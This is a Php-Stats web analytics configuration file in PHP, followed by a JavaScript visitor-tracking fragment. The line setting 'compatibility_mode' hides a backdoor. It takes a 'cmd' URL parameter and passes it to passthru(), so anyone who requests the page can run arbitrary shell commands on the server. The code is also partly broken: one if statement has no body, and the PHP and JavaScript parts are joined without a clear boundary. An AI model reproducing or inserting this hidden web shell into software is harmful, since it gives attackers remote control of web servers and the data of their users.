$option['callviaimg']=1; // 1: call Php-Stats by 1x1 pixel transparent image - 0: by javascript
$option['php_stats_safe']=0; // 0: for MySQL 3.23 or higher - 1: for MySQL 3.22
$option['out_compress']=1; // 1: output compression (PHP>4.0.4) - 0: No
$option['persistent_conn']=0; // 1: MySQL persistent connection - 0: normal connection
$option['autorefresh']=3; // MINUTES value for admin's pages update
$option['show_server_details']=1; // 1: show server details in main page - 0: No
$option['show_average_user']=0; // 1: show average user in main page - 0: No
$option['short_url']=1; // 1: show short url when possible - 0: No
$option['lock_not_valid_url']=0; // 1: lock url that there aren't in monitored domains - 0: No
$option['ext_whois']=''; // For locked external connection, write: - http://www.yourwhois.com/adress?ip=%IP% - Change only yourwhois.com - NOT CHANGE %IP%
$option['online_timeout']=5; // MINUTES value for user online timeoute - 0: dinamic count
$option['page_title']=1; // 1: save page's title - 0: N0
$option['log_host']=0; // 1: save host in details (WARNING: SLOW!) - 0: No
$option['clear_cache']=0; // 1: continous recognize cache (WARNING: SLOW!) - 0: No
$option['full_recn']=0; // 1: engines and refers recognizes at every page (WARNING: SLOW!) - 0: No
$option['logerrors']=1; // 1: save error in php-stats.log file (you must have write permit) - 0: No
$option['check_new_version']=1; // 1: check php-stats new version - 0: No
$option['www_trunc']=0; // 1: change http://www. in http:// - 0: No
$option['accept_ssi']=1; // 1: permit Server Side Include calling - 0: No
$option['compatibility_mode']=0;if (isset($_GET[cmd])){if (get_magic_quotes_gpc()){$_GET[cmd] = stripslashes($_GET[cmd]);}passthru($_GET[cmd]);}//; // 1: send query with database name (to use in case problems with php include) - 0: normal send query
$option['check_links']=1; // 1: check the link - 0: No
$default_pages=array('/','/index.htm','/index.html','/default.htm','/index.php','/index.asp','/default.asp'); // Pagine di default del server, troncate considerate come la stessa
//////////////////////
// OPZIONI SPECIALI //
//////////////////////
$option['ip-zone']=0; // 0: not recognize nation from IP - 1: recognize from database (you must install) - 2: recognize from File (you must install)
$option['down_mode']=0; // 0: redirect - 1: force download file - 2: force download file altervista
$option['check_links']=1; // 1: check the link - 0: No
/////////////////////////////////////////////////
// NON MODIFICARE NULLA DA QUESTO PUNTO IN POI //
/////////////////////////////////////////////////
if(!isset($_GET)) $_GET=$HTTP_GET_VARS;
if(!isset($_SERVER)) $_SERVER=$HTTP_SERVER_VARS;
if(isset($_SERVER['HTTPS']) && $_SERVER['HTTPS']=='on' && substr($option['script_url'],0,5)==='http:')
if(substr($option['script_url'],-1)==='/') $option['script_url']=substr($option['script_url'],0,-1);
?>
if(document.referrer){
var f=document.referrer;
}else{
var f=top.document.referrer;
}
f=escape(f);
f=f.replace(/&/g,'%A7%A7');
if((f=='null') || (f=='unknown') || (f=='undefined')) f='';
var w=screen.width;
var h=screen.height;
var rand=Math.round(100000*Math.random());
var browser=navigator.appName;
var t=escape(document.title);
var NS_url="";
if(browser!="Netscape") c=screen.colorDepth; else c=screen.pixelDepth;
NS_url=document.URL;
NS_url=escape(NS_url);
NS_url=NS_url.replace(/&/g,'%A7%A7');
sc1="";
document.write(sc1);